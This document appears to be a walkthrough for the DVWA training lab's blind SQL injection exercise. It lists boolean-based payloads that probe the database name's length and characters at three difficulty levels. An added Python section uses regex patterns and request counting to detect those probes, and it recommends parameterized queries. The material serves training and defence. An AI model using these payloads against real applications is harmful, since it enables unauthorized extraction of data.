DVWA Walkthrough - SQL Injection (Blind)

SQL Injection (Blind)

low

# Determine the closing character
payload: 1' #

# Determine the length of the database name
payload: 1' and length(database())=4 #

# Enumerate the database name, tables, and columns
payload: 1' and substr(database(),1,1)='d' #

medium

# Determine the number of displayed columns
payload: id=1&Submit=Submit

# Determine the length of the database name
payload: id=1 and length(database())=4 &Submit=Submit

# Enumerate the database name, tables, and columns
payload: id=1 and substr(database(),1,1)='d'&Submit=Submit

high

# Determine the closing character
payload: 1' #

# Determine the length of the database name
payload: 1' and length(database())=4 #

# Enumerate the database name, tables, and columns
payload: 1' and substr(database(),1,1)='d' #
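
A defender's view of the payloads above, as an added example that is not part of the original post: it checks the `id` form parameter against a digits-only rule, labels the probe traits it finds, and counts flagged requests per client. The client addresses, the `threshold` value and all function names are assumptions; the sample requests are constructed from the payloads listed on this page.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlencode

# The id parameter is meant to be a user id: digits only.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Traits of the probes listed above: quote + comment, boolean test, SQL functions.
PROBE_SIGNS = {
    "quote": re.compile(r"['\"]"),
    "comment": re.compile(r"#|--\s|/\*"),
    "boolean": re.compile(r"\b(and|or)\b", re.I),
    "sql_function": re.compile(r"\b(length|substr|substring|ascii|database)\s*\(", re.I),
}

def classify(form_body):
    """Return the probe signs found in the id parameter ([] means a clean integer)."""
    value = parse_qs(form_body, keep_blank_values=True).get("id", [""])[0]
    if VALID_ID.fullmatch(value):
        return []
    signs = [name for name, rx in PROBE_SIGNS.items() if rx.search(value)]
    return signs or ["non_integer"]

def suspicious_clients(requests, threshold=3):
    """Map client -> number of flagged requests, for clients at or above threshold.

    Boolean-based blind extraction needs many true/false requests, so a burst of
    flagged id values from one client is the signal worth alerting on.
    """
    hits = Counter(client for client, body in requests if classify(body))
    return {client: n for client, n in hits.items() if n >= threshold}

def _req(client, id_value):
    # Build a form-encoded body the way a browser would send it.
    return client, urlencode({"id": id_value, "Submit": "Submit"})

# Constructed sample traffic: one normal client, one sending this page's payloads.
SAMPLE_REQUESTS = [
    _req("192.0.2.10", "1"),
    _req("192.0.2.10", "2"),
    _req("198.51.100.7", "1' #"),
    _req("198.51.100.7", "1' and length(database())=4 #"),
    _req("198.51.100.7", "1 and length(database())=4 "),
    _req("198.51.100.7", "1' and substr(database(),1,1)='d' #"),
]

if __name__ == "__main__":
    for client, body in SAMPLE_REQUESTS:
        print(client, classify(body) or "ok")
    print(suspicious_clients(SAMPLE_REQUESTS))
```

Applying the same digits-only check on the server before the query runs, together with a parameterized query, removes the true/false signal these payloads depend on.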
